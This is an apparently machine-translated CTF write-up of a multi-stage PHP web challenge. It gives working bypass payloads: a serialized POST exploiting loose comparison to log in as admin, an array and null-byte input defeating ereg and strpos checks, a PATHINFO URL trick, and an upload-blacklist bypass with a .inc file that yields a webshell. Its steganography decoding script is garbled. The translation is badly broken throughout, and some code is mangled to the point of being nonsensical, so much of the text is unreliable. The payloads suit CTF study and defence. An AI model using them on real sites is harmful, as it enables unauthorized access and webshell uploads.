Three white hats-Rome 2-writeup

Three white hats-Roman series 2-writeup 0x00

Why does a good Web become misc? Friendship Boat !!!!

http://4e79618700b44607c.jie.sangebaimao.com

0x01 fetch source token

There is no Tips generation problem, the source region must be the first. Right-click to view the source region. there is no such thing. check the header.

Set-Cookie source=WXpOV2FXTXpVbmxMUnpGclRsTm5hMWd3WkVaV1JuTnVZekk1TVdOdFRteEtNVEJ3VEVSTmMwNXBhemxRVTBrMFRWZEZNRTFxWTJr

The answer is:

#!phpsubstr(md5($_GET['source']),3,6)=="81a427"

This familiar example has appeared in the homework of BCTF2016, although it is a little different. Lima provides an artifact

#!python#!/bin/env python#-*- encoding: utf-8 -*-import md5def mx(str):    m1 = md5.new()       m1.update(str)       return m1.hexdigest()if __name__ == '__main__':    m = '81a427'    for x in range(1,100000000):        a = mx(str(x))[3:9]        if a == m:            print x            break

Run 47733

/index.php?source=47733

You can get the download address/WoShiYuanMa_SGBM.zip of the source hosts package.

0x02 login holes

#!php$password = unserialize($_POST['password']);if($_POST['username']='admin' && $password['username'] !== 'admin' && $password['password'] !== 'admin'){    if ($password['username'] == 'admin' && $password['password']=='admin') {        $_SESSION['login'] = 1;        echo "
 
  Click jump to the Backstage
 ";    }

StartingUnserializeThe hacker hole in php. I found out that the vulnerability is a weak classification vulnerability in php features such as Taobao (=.

#!php(0 == "str")=>true(0 === "str")=>false

Create POST:

username=admin&password=a:2:{s:8:"username";i:0;s:8:"password";i:0;}&submit=1

Successfully approved ~

0x03 secondary certificate

#!phpif (isset($_POST['salt'])){    if (ereg("^[a-zA-Z0-9]+$", $_POST['salt']) === FALSE)    {        exit('ereg');    }    elseif (strlen($_POST['salt']) < 11 && $_POST['salt'] > 999999999)    {        if (strpos($_POST['salt'], '*SGBM*') !== FALSE)        {            $_SESSION['admin'] = 1;            echo "
 
  Click jump to the Backstage
 ";        }

At first glance, it seems very cute.

The ereg processing data group will getNULL,

SameStrlenProcessing Data groups will also getNULL,

Array ()> intTrue,

The strpos processing data group will also getNULL.

Create POST:

salt[]=v&submit=1

Again perfect.

However, the official question is:

Bypass ereg function, % 00 found

Then, according to php features: 9e9> 999999999

Expected result: salt = 9e9% 00 * SGBM *

0x04 PATHINFO mode

#!php$URL = $_SERVER['REQUEST_URI'];$matches = array();preg_match('/^([a-z\/.]+)$/', $URL, $matches); if(strpos($URL, './') !== FALSE){    exit('./');}else if(strpos($URL, '\\') !== FALSE){    exit('\\');}else if(empty($matches) || $matches[1] != $URL){    exit('empty($matches) || $matches[1] != $URL');} else if(strpos($URL, '//') !== FALSE){    exit('//');} else if(substr($URL, -10) !== '/index.php'){    exit('substr($URL, -10) !== \'/index.php\'');} else if(strpos($URL, 'p.') !== FALSE){    exit('p.');} else if($URL == '/admin/index.php'){    exit('$URL == \'/admin/index.php\'');}else {    if($URL !== '/admin/index.php'){        $_SESSION['power'] = 1;        exit("
 
  Click jump to the Backstage
 ");    }}

Starting from beginning to beginning, there was no solution, and then we got the Tips of Great God.

Still lack of experience ~

LN tips:

Answer Question (516421987) 1:12:49 multi-point frame experience should be able to guess

If BaiduPATHINFO mode

URL:/admin/index. php/admin/index. php

Successfully approved ~

0x05 fuzz Post-fuzz

#! Phpif ($ _ FILES ["file"] ['size']> 0 & $ _ FILES ["file"] ['size'] <102400) {$ typeAccepted = ["image/jpeg", "image/gif", "image/png"]; $ blackext = ["php", "php3", "php4 ", "php5", "pht", "phtml", "phps"]; // There is always a suitable $ filearr = pathinfo ($ _ FILES ["file"] ["name"]); if (! In_array ($ _ FILES ["file"] ['type'], $ typeAccepted) {exit ("type error ");} if (in_array ($ filearr ["extension"], $ blackext) {exit ("extension error") ;}$ filename = md5 (time (). rand (10, 99 )). ". ". $ filearr ["extension"]; $ destination_folder = '.. /uploads/'; $ destination_folder. = date ('Y', time ()). "/". date ('M', time ()). "/"; $ file_name_path = $ destination_folder. $ filename; if (! File_exists ($ destination_folder) mkdir ('. /'. $ destination_folder, 0777, true); if (move_uploaded_file ($ _ FILES ["file"] ['tmp _ name'], $ file_name_path) {exit ('upload success! ');} Else {exit ('upload false! ');}}

Black name list for the last day: $ blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];

The specified file name $ filename = md5 (time (). rand (10, 99). ".". $ filearr ["extension"];

It depends on the suffix name after Fuzz.

At the beginning, I guess that the suffix name can be parsed by rows, but it is basically too old. Finally, I thought there was another inc suffix.

If it weren't for me that I had just rolled over the Phar package, I wouldn't have remembered the suffix name related to php.

#!php
 buildFromDirectory(dirname(__FILE__) . '/virink');$phar->setStub($phar->createDefaultStub('virink.php', 'virink.php'));$phar->compressFiles(Phar::GZ);?>

GenerateVirink. pharFile, you will find

#!phpExtract_Phar::go(true);$mimes = array('phps' => 2,...，'xsd' => 'text/plain','php' => 1,'inc' => 1,'avi' => 'video/avi',...

If so, after the inc operation is completed, the row can be merged.

The problem is really awesome.

As for file name brute-force cracking, when Fuzz was started, a POC in the PHP script was written by the attacker.

#!php
 virinkTEXT;$ext = 'inc';fuck($ext, $contents);?>

It's a little bit difficult to change, and it will be used in the future.

Getshell successful ~~

0x06 what a ghost? Misc

After getshell, it really hurts!

Imstudy (214329772) at 1:44:30, I said that the shell is broken. you don't believe me.

No,ImstudyIt's the problem Guy, boy. pick up the Langya stick in your hand and keep the security card intact ~~

When the kitchen knife is installed, it is found that/var/www/mesh is a video.Flag.jpg

ArtifactsStegsolve + WinHexTo extract the flag.txt package.

However, it is not the true flag, but the things in N-perspiration (x, y, z) format. Between 0 and, the guess is the RGB value.

This may have to be completed.

Calculates the row number, which is not the square size of the regular order.

Silently fold a POC and perfectly fold the photo.

#! Python #! /Bin/env python #-*-encoding: UTF-8-*-# _ author __: virinkfrom PIL import Imageimport matffe _ name _ = '_ main _': count = len(open('flag.txt ', 'r '). readlines () j = int (math. sqrt (count) I = j + 2 for k in range (0, I/4): sx = I-k sy = j + k if (sx * sy) = count: break c = Image. new ("RGB", (sx, sy) file = open('flag.txt ') for x in range (0, sx): for y in range (0, sy ): line = file. readline () # obtain a row of rgb = line. split (",") # separate rgb c. putpixel (x, y), (int (rgb [0]), int (rgb [1]), int (rgb [2]) c. show () c. save ("flag.png ")

It's okay. at this moment, my mind is falling!

FLAG ： miao{fb49ac8a528901913ea2c664c6a8d6a1}